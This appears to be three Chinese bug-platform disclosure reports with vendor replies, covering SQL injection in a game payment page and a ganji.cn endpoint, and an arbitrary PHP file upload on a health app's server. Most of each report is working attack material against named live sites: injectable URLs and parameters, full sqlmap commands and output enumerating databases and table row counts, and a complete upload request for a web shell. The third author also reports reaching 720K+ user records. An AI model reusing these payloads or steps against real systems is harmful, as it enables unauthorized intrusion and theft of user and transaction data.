漏洞详情披露状态： 2016-05-02： 细节已通知厂商并且等待厂商处理中2016-05-06： 厂商已经确认，细节仅向厂商公开2016-05-16： 细节向核心白帽子及相关领域专家公开2016-05-26： 细节向普通白帽子公开2016-06-05： 细节向实习白帽子公开2016-06-20： 细节向公众公开简要描述：RT详细说明： code 区域http://**.**.**.**/游光网络是微信游戏比较火的开发商，允许微信不用注册直接登录玩，目前比较火的游戏有 怪兽必须死 勇士之塔 三国浮生记 都允许用微信直接支付充值 我查看了一下交易记录 每一秒都有7/8单充值记录 虽然都是小金额2块5块，但是一天下来收入统计还是很可观注入点在web充值页面code 区域http://**.**.**.**/pay/alipay2/mask 区域*****yap***** ?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8放sqlmap跑code 区域sqlmap -u 'http://**.**.**.**/pay/alipay2/mask 区域*****yap***** ?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8' -p 'product_id'____ ___| |_____ ___ ___ {**.**.**.**#dev}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _||_| |_| http://**.**.**.**[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 20:46:06[20:46:07] [WARNING] it appears that you have provided tainted parameter values ('product_id=1 or 8=8') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properlyare you really sure that you want to continue (sqlmap could have problems)? [y/N] y[20:46:08] [INFO] resuming back-end DBMS 'mysql' [20:46:08] [INFO] testing connection to the target URLsqlmap resumed the following injection point(s) from stored session:---Parameter: product_id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND 9197=9197Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (SELECT)Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND (SELECT * FROM (SELECT(SLEEP(5)))ERLp)Type: UNION queryTitle: Generic UNION query (NULL) - 3 columnsPayload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=-2170 UNION ALL SELECT CONCAT(0x717a7a7071,0x4978706a5555576761676c5362744f51736a417a59584c594a59524749636441446e784c64546671,0x717a627671),NULL,NULL-- ----[20:46:08] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: MySQL 5.0.12 漏洞证明：数据库code 区域sqlmap -u 'http://**.**.**.**/pay/alipay2/mask 区域*****yap***** ?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8' -p 'product_id' -D money --tables --count____ ___| |_____ ___ ___ {**.**.**.**#dev}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _||_| |_| http://**.**.**.**[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 20:47:00[20:47:00] [WARNING] it appears that you have provided tainted parameter values ('product_id=1 or 8=8') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properlyare you really sure that you want to continue (sqlmap could have problems)? [y/N] y[20:47:01] [INFO] resuming back-end DBMS 'mysql' [20:47:01] [INFO] testing connection to the target URLsqlmap resumed the following injection point(s) from stored session:---Parameter: product_id (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND 9197=9197Type: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (SELECT)Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND (SELECT * FROM (SELECT(SLEEP(5)))ERLp)Type: UNION queryTitle: Generic UNION query (NULL) - 3 columnsPayload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=-2170 UNION ALL SELECT CONCAT(0x717a7a7071,0x4978706a5555576761676c5362744f51736a417a59584c594a59524749636441446e784c64546671,0x717a627671),NULL,NULL-- ----[20:47:01] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: MySQL 5.0.12[20:47:01] [INFO] fetching tables for database: 'money'[20:47:01] [INFO] the SQL query used returns 19 entries[20:47:01] [INFO] resumed: channel_tradeno[20:47:01] [INFO] resumed: cp_trans[20:47:01] [INFO] resumed: distr_stat[20:47:01] [INFO] resumed: distr_sum[20:47:01] [INFO] resumed: game_v2[20:47:01] [INFO] resumed: marchant[20:47:01] [INFO] resumed: mch_func_priv[20:47:01] [INFO] resumed: mch_games[20:47:01] [INFO] resumed: mch_priv[20:47:01] [INFO] resumed: online[20:47:01] [INFO] resumed: product_sum[20:47:01] [INFO] resumed: product_v2[20:47:01] [INFO] resumed: register[20:47:01] [INFO] resumed: sum[20:47:01] [INFO] resumed: talking_data_result[20:47:01] [INFO] resumed: trans[20:47:01] [INFO] resumed: trans_back[20:47:01] [INFO] resumed: user_channel_sum[20:47:01] [INFO] resumed: user_channel_transDatabase: money [19 tables]+---------------------+| sum || channel_tradeno || cp_trans || distr_stat || distr_sum || game_v2 || marchant || mch_func_priv || mch_games || mch_priv || online || product_sum || product_v2 || register || talking_data_result || trans || trans_back || user_channel_sum || user_channel_trans |+---------------------+[20:47:01] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tablesDatabase: money+---------------------+---------+| Table | Entries |+---------------------+---------+| trans | 16486615 || trans_back | 14759999 || online | 7397218 || cp_trans | 113319 || product_sum | 27005 || `sum` | 15403 || talking_data_result | 11257 || user_channel_sum | 3924 || distr_sum | 2431 || channel_tradeno | 1776 || product_v2 | 687 || distr_stat | 571 || mch_games | 150 || game_v2 | 89 || marchant | 78 || register | 45 || mch_priv | 5 || mch_func_priv | 1 |+---------------------+---------+1600W交易记录修复方案：过滤版权声明：转载请注明来源 我在不想理你@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：10确认时间：2016-05-06 19:37厂商回复：CNVD未直接确认所述情况，已经由CNVD通过网站公开联系方式向网站管理单位通报。最新状态：暂无

漏洞详情披露状态： 2016-05-03： 细节已通知厂商并且等待厂商处理中2016-05-06： 厂商已经确认，细节仅向厂商公开2016-05-16： 细节向核心白帽子及相关领域专家公开2016-05-26： 细节向普通白帽子公开2016-06-05： 细节向实习白帽子公开2016-06-20： 细节向公众公开简要描述：赶集网某站存在MySQL注射顺便试试自己写的扫描工具效果如何详细说明： code 区域mobds.ganji.cn/datashare/postcode 区域action=1&filters={"major":"9","tag":"0","city":"0","district":"-1","price":"4","degree":"0","work_years":"0","company_scale":"0"}code 区域注入参数#district共17个数据库漏洞证明： code 区域[*] `58monitor` [*] console [*] credit [*] information_schema [*] management [*] mob_packget [*] mob_publish [*] mob_push [*] mobile_ad [*] mobile_app_config [*] mobile_job [*] mobqe [*] mysql [*] percona [*] performance_schema [*] test [*] widget修复方案：过滤神马的版权声明：转载请注明来源 Aasron@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：15确认时间：2016-05-06 09:51厂商回复：感谢关注赶集安全。最新状态：暂无

漏洞详情披露状态： 2016-05-09： 细节已通知厂商并且等待厂商处理中2016-05-09： 厂商已经确认，细节仅向厂商公开2016-05-19： 细节向核心白帽子及相关领域专家公开2016-05-29： 细节向普通白帽子公开2016-06-08： 细节向实习白帽子公开2016-06-23： 细节向公众公开简要描述：APP安全之文件上传详细说明：目标：www.xueyazhushou.com使用体检宝IOS APP的头像上传处，即可上传任意文件，可直接Getshellcode 区域POST http://www.xueyazhushou.com/api/upload.php HTTP/1.1 Host: www.xueyazhushou.com Content-Type: multipart/form-data; boundary=Boundary+EB2F8A2B55862450 Connection: keep-alive Connection: keep-alive Accept: */* User-Agent: JKHealthAssistant/2.5 (iPhone; iOS 9.3.1; Scale/2.00) Accept-Language: zh-Hans-CN;q=1, en-US;q=0.9 Content-Length: 240 Accept-Encoding: gzip, deflate --Boundary+EB2F8A2B55862450 Content-Disposition: form-data; name="uploadedfile"; filename="image_qq2A733285578BBC25CED5D0CBFC674378_20160508105620_ios.php" Content-Type: image/jpeg <?php phpinfo(); ?> --Boundary+EB2F8A2B55862450-- 漏洞证明：1、phpinfo2、Getshell3、翻了下发现数据库配置文件，连上后发现72W+用户数据，仅作证明，具体就不深入了 修复方案：请多指教~版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：20确认时间：2016-05-09 10:17厂商回复：自学php3个月，写的破代码被各种打脸。谢谢各位大牛最新状态：暂无